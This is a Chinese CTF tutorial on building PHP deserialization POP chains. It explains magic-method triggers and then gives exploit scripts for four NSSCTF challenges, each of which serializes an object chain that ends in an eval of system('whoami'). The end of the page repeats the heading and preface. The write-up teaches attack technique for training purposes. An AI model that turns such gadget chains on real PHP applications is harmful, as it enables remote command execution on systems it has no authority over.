PHP反序列化与POP链构造详解<\/h1>

前言<\/h2>
PHP反序列化是CTF比赛中常见的题型，也是代码审计中的重要板块。通过反序列化操作，攻击者可以执行恶意命令，获取shell或其他权限。本文将详细讲解PHP反序列化中POP链的构造方法。<\/p>

前置知识：PHP魔术方法<\/h2>

魔术方法是PHP面向对象中特有的特性，以双下划线开头，在特定情况下自动触发。以下是POP链构造中常见的魔术方法：<\/p>

__wakeup()<\/code>：在反序列化时自动调用<\/li>
__destruct()<\/code>：对象被销毁时自动调用<\/li>
__toString()<\/code>：对象被当做字符串处理时调用（如echo、==、preg_match()等）<\/li>
__call()<\/code>：调用不存在的方法时触发<\/li>
__get()<\/code>：访问不可访问属性时调用<\/li>
__set()<\/code>：给不存在的成员属性赋值时触发<\/li>

__invoke()<\/code>：对象被当做函数调用时触发<\/li>
<\/ol>
POP链构造思路<\/h2>

确定链尾<\/strong>：找到执行危险操作（如eval、system等）的类和方法<\/li>
确定入口<\/strong>：通常是__wakeup<\/code>或__destruct<\/code>方法<\/li>
搭建桥梁<\/strong>：通过魔术方法的触发条件连接各个类<\/li>
<\/ol>
实例分析<\/h2>
案例1：三类的简单POP链<\/h3>
题目来源<\/strong>：NSSCTF 5816<\/p>
类结构<\/strong>：<\/p>

step0ne（入口类，含__destruct<\/code>）<\/li>
steptw0（桥梁类，含__toString<\/code>）<\/li>
stepthr33（链尾类，含__call<\/code>和eval）<\/li>
<\/ol>
POP链构造<\/strong>：<\/p>

step0ne::__destruct<\/code> -> 将$Manbo赋值为steptw0实例<\/li>
触发steptw0::__toString<\/code> -> 将$zabuzabu赋值为stepthr33实例<\/li>
调用不存在方法manbo()<\/code> -> 触发stepthr33::__call<\/code><\/li>
执行eval中的命令<\/li>
<\/ol>
EXP<\/strong>：<\/p>
<?<\/span>php<\/span>
<\/span><\/span>class<\/span> step0ne<\/span> {
<\/span><\/span>    public<\/span> $Manbo;
<\/span><\/span>}
<\/span><\/span>
<\/span><\/span>class<\/span> steptw0<\/span> {
<\/span><\/span>    public<\/span> $zabuzabu;
<\/span><\/span>}
<\/span><\/span>
<\/span><\/span>class<\/span> stepthr33<\/span> {
<\/span><\/span>    public<\/span> $hajimi =<\/span> "system('whoami');"<\/span>;
<\/span><\/span>}
<\/span><\/span>
<\/span><\/span>$obj =<\/span> new<\/span> step0ne<\/span>();
<\/span><\/span>$obj-><\/span>Manbo<\/span> =<\/span> new<\/span> steptw0<\/span>();
<\/span><\/span>$obj-><\/span>Manbo<\/span>-><\/span>zabuzabu<\/span> =<\/span> new<\/span> stepthr33<\/span>();
<\/span><\/span>
<\/span><\/span>echo<\/span> serialize<\/span>($obj);
<\/span><\/span>?><\/span>
<\/span><\/span><\/span><\/code><\/pre>案例2：使用__get<\/code>和__set<\/code>的POP链<\/h3>
题目来源<\/strong>：NSSCTF 5819<\/p>
类结构<\/strong>：<\/p>

step0ne（入口类，含__destruct<\/code>）<\/li>
steptw0（桥梁类，含__get<\/code>和__set<\/code>）<\/li>
stepthr33（链尾类，含__call<\/code>）<\/li>
<\/ol>
POP链构造<\/strong>：<\/p>

step0ne::__destruct<\/code> -> 将$nl赋值为steptw0实例<\/li>
访问不存在的base64属性 -> 触发steptw0::__get<\/code><\/li>
给不存在的tail属性赋值 -> 触发steptw0::__set<\/code><\/li>
调用不存在方法 -> 触发stepthr33::__call<\/code><\/li>
<\/ol>
EXP<\/strong>：<\/p>
<?<\/span>php<\/span>
<\/span><\/span>class<\/span> step0ne<\/span> {
<\/span><\/span>    public<\/span> $nl;
<\/span><\/span>}
<\/span><\/span>
<\/span><\/span>class<\/span> steptw0<\/span> {
<\/span><\/span>    public<\/span> $tail;
<\/span><\/span>}
<\/span><\/span>
<\/span><\/span>class<\/span> stepthr33<\/span> {
<\/span><\/span>    public<\/span> $hajimi =<\/span> "system('whoami');"<\/span>;
<\/span><\/span>}
<\/span><\/span>
<\/span><\/span>$obj =<\/span> new<\/span> step0ne<\/span>();
<\/span><\/span>$obj-><\/span>nl<\/span> =<\/span> new<\/span> steptw0<\/span>();
<\/span><\/span>$obj-><\/span>nl<\/span>-><\/span>tail<\/span> =<\/span> new<\/span> stepthr33<\/span>();
<\/span><\/span>
<\/span><\/span>echo<\/span> serialize<\/span>($obj);
<\/span><\/span>?><\/span>
<\/span><\/span><\/span><\/code><\/pre>案例3：五类的复杂POP链<\/h3>
题目来源<\/strong>：NSSCTF 5807<\/p>
类结构<\/strong>：<\/p>

step0ne（入口类，含__destruct<\/code>）<\/li>
steptw0（桥梁类1，含__toString<\/code>）<\/li>
stepthr33（桥梁类2）<\/li>
stepf0ur（桥梁类3，含__set<\/code>）<\/li>
stepfinall（链尾类，含__call<\/code>）<\/li>
<\/ol>
POP链构造<\/strong>：<\/p>

step0ne::__destruct<\/code> -> 赋值触发steptw0::__toString<\/code><\/li>
steptw0::__toString<\/code> -> 连接stepthr33<\/li>
stepthr33<\/code> -> 连接stepf0ur<\/li>
stepf0ur::__set<\/code>中的方法调用 -> 触发stepfinall::__call<\/code><\/li>
<\/ol>
EXP<\/strong>：<\/p>
<?<\/span>php<\/span>
<\/span><\/span>class<\/span> step0ne<\/span> {
<\/span><\/span>    public<\/span> $Manbo;
<\/span><\/span>}
<\/span><\/span>
<\/span><\/span>class<\/span> steptw0<\/span> {
<\/span><\/span>    public<\/span> $zabuzabu;
<\/span><\/span>}
<\/span><\/span>
<\/span><\/span>class<\/span> stepthr33<\/span> {
<\/span><\/span>    public<\/span> $nainiu;
<\/span><\/span>}
<\/span><\/span>
<\/span><\/span>class<\/span> stepf0ur<\/span> {
<\/span><\/span>    public<\/span> $nainiu;
<\/span><\/span>}
<\/span><\/span>
<\/span><\/span>class<\/span> stepfinall<\/span> {
<\/span><\/span>    public<\/span> $hajimi =<\/span> "system('whoami');"<\/span>;
<\/span><\/span>}
<\/span><\/span>
<\/span><\/span>$obj =<\/span> new<\/span> step0ne<\/span>();
<\/span><\/span>$obj-><\/span>Manbo<\/span> =<\/span> new<\/span> steptw0<\/span>();
<\/span><\/span>$obj-><\/span>Manbo<\/span>-><\/span>zabuzabu<\/span> =<\/span> new<\/span> stepthr33<\/span>();
<\/span><\/span>$obj-><\/span>Manbo<\/span>-><\/span>zabuzabu<\/span>-><\/span>nainiu<\/span> =<\/span> new<\/span> stepf0ur<\/span>();
<\/span><\/span>$obj-><\/span>Manbo<\/span>-><\/span>zabuzabu<\/span>-><\/span>nainiu<\/span>-><\/span>nainiu<\/span> =<\/span> new<\/span> stepfinall<\/span>();
<\/span><\/span>
<\/span><\/span>echo<\/span> serialize<\/span>($obj);
<\/span><\/span>?><\/span>
<\/span><\/span><\/span><\/code><\/pre>案例4：六类的复杂POP链（SWPUCTF 2024）<\/h3>
题目来源<\/strong>：NSSCTF 5945<\/p>
类结构<\/strong>：<\/p>

眼见喜（入口类，含__wakeup<\/code>）<\/li>
耳听怒（桥梁类1，含__invoke<\/code>）<\/li>
鼻嗅爱（桥梁类2，含__toString<\/code>）<\/li>
舌尝思（桥梁类3）<\/li>
身本忧（桥梁类4）<\/li>
意见欲（链尾类，含__call<\/code>）<\/li>
<\/ol>
POP链构造<\/strong>：<\/p>

眼见喜::__wakeup<\/code> -> 满足条件触发耳听怒::__invoke<\/code><\/li>
耳听怒::__invoke<\/code> -> echo触发鼻嗅爱::__toString<\/code><\/li>
鼻嗅爱::__toString<\/code> -> 连接身本忧<\/li>
身本忧<\/code>调用不存在方法 -> 触发意见欲::__call<\/code><\/li>
<\/ol>
特殊处理<\/strong>：<\/p>

私有属性问题：高版本PHP可忽略访问性，或改为public<\/li>
引用绕过：$亢金龙 = &$定风珠<\/code><\/li>
<\/ul>
EXP<\/strong>：<\/p>
<?<\/span>php<\/span>
<\/span><\/span>class<\/span> 眼见喜<\/span> {
<\/span><\/span>    public<\/span> $幽魂;
<\/span><\/span>}
<\/span><\/span>
<\/span><\/span>class<\/span> 耳听怒<\/span> {
<\/span><\/span>    public<\/span> $黄风大圣;
<\/span><\/span>}
<\/span><\/span>
<\/span><\/span>class<\/span> 鼻嗅爱<\/span> {
<\/span><\/span>    public<\/span> $定风珠 =<\/span> '落地'<\/span>;
<\/span><\/span>    public<\/span> $亢金龙;
<\/span><\/span>    
<\/span><\/span>    public<\/span> function<\/span> __construct() {
<\/span><\/span>        $this-><\/span>亢金龙<\/span> =<\/span> &<\/span>$this-><\/span>定风珠<\/span>;
<\/span><\/span>    }
<\/span><\/span>}
<\/span><\/span>
<\/span><\/span>class<\/span> 身本忧<\/span> {
<\/span><\/span>    public<\/span> $夜叉;
<\/span><\/span>    public<\/span> $左轮;
<\/span><\/span>}
<\/span><\/span>
<\/span><\/span>class<\/span> 意见欲<\/span> {
<\/span><\/span>    public<\/span> $hajimi =<\/span> "system('whoami');"<\/span>;
<\/span><\/span>}
<\/span><\/span>
<\/span><\/span>$obj =<\/span> new<\/span> 眼见喜<\/span>();
<\/span><\/span>$obj-><\/span>幽魂<\/span> =<\/span> new<\/span> 耳听怒<\/span>();
<\/span><\/span>$obj-><\/span>幽魂<\/span>-><\/span>黄风大圣<\/span> =<\/span> new<\/span> 鼻嗅爱<\/span>();
<\/span><\/span>$obj-><\/span>幽魂<\/span>-><\/span>黄风大圣<\/span>-><\/span>黄风大圣<\/span> =<\/span> new<\/span> 身本忧<\/span>();
<\/span><\/span>$obj-><\/span>幽魂<\/span>-><\/span>黄风大圣<\/span>-><\/span>黄风大圣<\/span>-><\/span>夜叉<\/span> =<\/span> new<\/span> 意见欲<\/span>();
<\/span><\/span>
<\/span><\/span>echo<\/span> serialize<\/span>($obj);
<\/span><\/span>?><\/span>
<\/span><\/span><\/span><\/code><\/pre>总结<\/h2>

快速定位<\/strong>：先找链尾（危险函数）和入口（__wakeup<\/code>\/__destruct<\/code>）<\/li>
魔术方法串联<\/strong>：根据触发条件连接各个类<\/li>
条件绕过<\/strong>：注意类中的条件判断，使用引用等技术绕过<\/li>
属性访问<\/strong>：处理私有属性问题（改为public或使用高版本PHP特性）<\/li>
简洁构造<\/strong>：变量越少越好，提高可读性和可维护性<\/li>
<\/ol>
通过大量练习和总结，可以熟练掌握POP链的构造技巧，应对各种反序列化题目。<\/p>

PHP反序列化与POP链构造详解<\/h1>

前言<\/h2> PHP反序列化是CTF比赛中常见的题型，也是代码审计中的重要板块。通过反序列化操作，攻击者可以执行恶意命令，获取shell或其他权限。本文将详细讲解PHP反序列化中POP链的构造方法。<\/p>

实例分析<\/h2>

前言<\/h2>
PHP反序列化是CTF比赛中常见的题型，也是代码审计中的重要板块。通过反序列化操作，攻击者可以执行恶意命令，获取shell或其他权限。本文将详细讲解PHP反序列化中POP链的构造方法。<\/p>